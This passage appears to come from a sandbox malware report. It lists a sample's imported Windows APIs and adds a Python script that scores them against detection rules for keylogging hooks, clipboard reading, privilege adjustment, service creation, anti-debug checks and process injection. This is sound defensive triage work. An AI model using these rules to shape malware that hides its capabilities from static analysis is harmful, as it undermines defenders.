 0x71e644 CM_Get_DevNode_Registry_Property_ExW
 0x71e648 CM_Get_Sibling_Ex
 0x71e64c SetupDiDestroyDriverInfoList
 0x71e650 SetupDiBuildDriverInfoList
 0x71e654 SetupDiOpenDevRegKey
 0x71e658 SetupDiGetDeviceInstanceIdW
 0x71e65c SetupDiGetDeviceRegistryPropertyW
 0x71e660 SetupDiGetDeviceRegistryPropertyA
 0x71e664 SetupCloseFileQueue
 0x71e668 SetupDiDestroyDeviceInfoList
 0x71e66c SetupDiGetClassDevsW
POWRPROF.dll
 0x71e5dc GetActivePwrScheme
 0x71e5e0 ReadPwrScheme
 0x71e5e4 GetPwrCapabilities
PSAPI.DLL
 0x71e5ec GetProcessImageFileNameW
 0x71e5f0 GetModuleFileNameExW
 0x71e5f4 GetProcessMemoryInfo
WINMM.dll
 0x71e998 waveOutMessage
 0x71e99c waveOutGetDevCapsW
 0x71e9a0 waveInGetDevCapsW
 0x71e9a4 waveOutGetNumDevs
 0x71e9a8 waveInGetNumDevs
 0x71e9ac waveInMessage
NETAPI32.dll
 0x71e56c NetWkstaGetInfo
 0x71e570 NetUserGetInfo
 0x71e574 NetUserModalsGet
 0x71e578 NetApiBufferFree
SHLWAPI.dll
 0x71e698 PathFileExistsW
 0x71e69c PathAppendW
 0x71e6a0 PathAddExtensionW
 0x71e6a4 PathRemoveFileSpecW
 0x71e6a8 PathIsDirectoryW
 0x71e6ac PathStripPathW
 0x71e6b0 PathMatchSpecW
 0x71e6b4 PathRemoveExtensionW
 0x71e6b8 PathCombineW
 0x71e6bc PathFindFileNameA
 0x71e6c0 PathCanonicalizeW
 0x71e6c4 StrFormatByteSizeW
 0x71e6c8 PathIsDirectoryEmptyW
MSIMG32.dll
 0x71e560 AlphaBlend
 0x71e564 TransparentBlt
COMCTL32.dll
 0x71e0f8 DestroyPropertySheetPage
 0x71e0fc _TrackMouseEvent
 0x71e100 InitCommonControlsEx
 0x71e104 PropertySheetW
 0x71e108 CreatePropertySheetPageW
CRYPT32.dll
 0x71e120 CryptQueryObject
 0x71e124 CertGetNameStringW
 0x71e128 CertCloseStore
 0x71e12c CryptMsgClose
 0x71e130 CertFindCertificateInStore
 0x71e134 CryptDecodeObject
 0x71e138 CryptMsgGetParam
 0x71e13c CertFreeCertificateContext
WINTRUST.dll
 0x71e9cc WinVerifyTrust
WS2_32.dll
 0x71e9d4 WSALookupServiceEnd
 0x71e9d8 WSAGetLastError
 0x71e9dc WSALookupServiceNextW
 0x71e9e0 WSACleanup
 0x71e9e4 WSAStartup
 0x71e9e8 WSALookupServiceBeginW
 0x71e9ec inet_addr
 0x71e9f0 htonl
 0x71e9f4 inet_ntoa
 0x71e9f8 WSAAddressToStringW
 0x71e9fc htons
 0x71ea00 getnameinfo
WINSPOOL.DRV
 0x71e9b4 EnumPrintersW
 0x71e9b8 None
 0x71e9bc ClosePrinter
 0x71e9c0 OpenPrinterW
 0x71e9c4 GetPrinterDriverW

EAT(Export Address Table) is none
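
An import table this size says a lot before the sample is ever run, provided combinations rather than single APIs are scored. The script below is an added example (not the sandbox's own logic): it parses an excerpt of the IAT listing above in the report's own "DLL" / " 0xaddr Name" layout, fires capability rules that require sets of imports together, and records the one unnamed entry (" 0x71e9b8 None" under WINSPOOL.DRV) as unresolved. The capability names and rule sets are this example's own assumptions. One caveat the code makes explicit: GetProcAddress with LoadLibrary* is imported, so anything the sample resolves at run time (for instance the WriteProcessMemory/CreateRemoteThread injection set, which is absent here) cannot be ruled out from the static import list.

```python
"""Static capability triage from an IAT listing in the report's format.

Added example, not part of the sandbox report. IAT_EXCERPT is copied from
the IAT section above; CAPABILITIES (names and required import sets) is
this example's own rule set, not a published taxonomy.
"""

IAT_EXCERPT = """\
WTSAPI32.dll
 0x71ea08 WTSQuerySessionInformationW
IPHLPAPI.DLL
 0x71e210 GetAdaptersAddresses
WININET.dll
 0x71e968 InternetOpenW
 0x71e984 HttpSendRequestW
KERNEL32.dll
 0x71e2ac GetProcAddress
 0x71e374 IsDebuggerPresent
 0x71e39c GlobalMemoryStatusEx
 0x71e3d4 VirtualAlloc
 0x71e3dc OpenProcess
 0x71e418 LoadLibraryA
 0x71e448 Process32NextW
 0x71e44c Process32FirstW
 0x71e450 CreateToolhelp32Snapshot
USER32.dll
 0x71e798 GetClipboardData
 0x71e7ac OpenClipboard
 0x71e884 CallNextHookEx
 0x71e888 SetWindowsHookExW
 0x71e890 GetKeyboardState
ADVAPI32.dll
 0x71e094 LookupPrivilegeValueW
 0x71e098 AdjustTokenPrivileges
 0x71e0bc CreateServiceA
 0x71e0c8 StartServiceA
 0x71e0d0 OpenSCManagerA
 0x71e0dc RegLoadKeyW
ole32.dll
 0x71ea1c CoSetProxyBlanket
 0x71ea28 CoInitializeSecurity
 0x71ea38 CoCreateInstance
WINSPOOL.DRV
 0x71e9b4 EnumPrintersW
 0x71e9b8 None
"""

# capability -> (imports that must all be present, imports of which at least one must be present)
CAPABILITIES = {
    "keyboard hook": ({"SetWindowsHookExW"}, {"GetKeyboardState", "GetKeyState", "CallNextHookEx"}),
    "clipboard read": ({"OpenClipboard", "GetClipboardData"}, set()),
    "process enumeration": ({"CreateToolhelp32Snapshot", "Process32FirstW"}, set()),
    "privilege adjustment": ({"LookupPrivilegeValueW", "AdjustTokenPrivileges"}, set()),
    "service control": ({"OpenSCManagerA"}, {"CreateServiceA", "StartServiceA", "DeleteService"}),
    "wininet http client": ({"InternetOpenW", "HttpSendRequestW"}, set()),
    "anti-debug / environment checks": (set(), {"IsDebuggerPresent", "GetAdaptersAddresses", "GlobalMemoryStatusEx"}),
    "offline hive loading": ({"RegLoadKeyW"}, set()),
    "com security (wmi-style client)": ({"CoInitializeSecurity", "CoSetProxyBlanket", "CoCreateInstance"}, set()),
    "classic injection": ({"OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"}, set()),
}
LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}


def parse_iat(text):
    """Return ({dll: {function, ...}}, [(dll, addr) for entries listed as None])."""
    imports, unresolved, dll = {}, [], None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if not raw.startswith(" "):          # library header line
            dll = raw.strip().lower()
            imports.setdefault(dll, set())
            continue
        addr, name = raw.split()
        if name == "None":                    # ordinal or unreadable import
            unresolved.append((dll, addr))
        else:
            imports[dll].add(name)
    return imports, unresolved


def triage(imports):
    """Return ({capability: matched imports}, dynamic_resolution_possible)."""
    names = set().union(*imports.values())
    found = {}
    for cap, (need_all, need_any) in CAPABILITIES.items():
        if need_all <= names and (not need_any or need_any & names):
            found[cap] = sorted(need_all | (need_any & names))
    dynamic = "GetProcAddress" in names and bool(LOADERS & names)
    return found, dynamic


if __name__ == "__main__":
    imports, unresolved = parse_iat(IAT_EXCERPT)
    found, dynamic = triage(imports)
    for cap, apis in found.items():
        print(f"{cap}: {', '.join(apis)}")
    print("unresolved:", unresolved)
    print("dynamic API resolution possible, absent capabilities not ruled out:", dynamic)
```

Run against the full table above rather than the excerpt, the same rules hold; the important negative is that no WriteProcessMemory or CreateRemoteThread appears anywhere in the listing, which is consistent with the report's RWX-allocation signature being self-unpacking rather than remote injection, but only the dynamic-resolution flag tells you how much weight that absence can carry.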
